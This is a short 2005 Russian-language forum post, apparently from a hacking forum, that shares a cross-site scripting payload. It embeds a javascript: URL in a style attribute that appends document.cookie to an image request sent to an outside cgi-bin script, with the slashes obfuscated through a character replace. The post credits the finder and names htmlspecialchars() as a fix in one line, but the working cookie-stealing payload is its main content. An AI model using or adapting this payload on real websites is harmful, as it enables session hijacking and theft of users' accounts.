13.01.2005, 23:42
|
|
Новичок
Регистрация: 26.12.2004
Сообщений: 5
С нами:
11248211
Репутация:
0
|
|
Вот пример:
Код:
http://www.smailiki.nm.ru/lam/lam4.gif" style="background:url(javascript:document.images[0].src=/http:xxantichat.ruxcgi-binxs.jpg?/.source.replace(/x/g,String.fromCharCode(47))+document.cookie)
Кто будет писать видео, просьба написать, что уязвимость нашел Mr. Iron (icq # 9170797)
Самое простое решение против этого XSS - это htmlspecialchars()
Последний раз редактировалось Егорыч+++; 14.01.2005 в 00:11..
|
|
|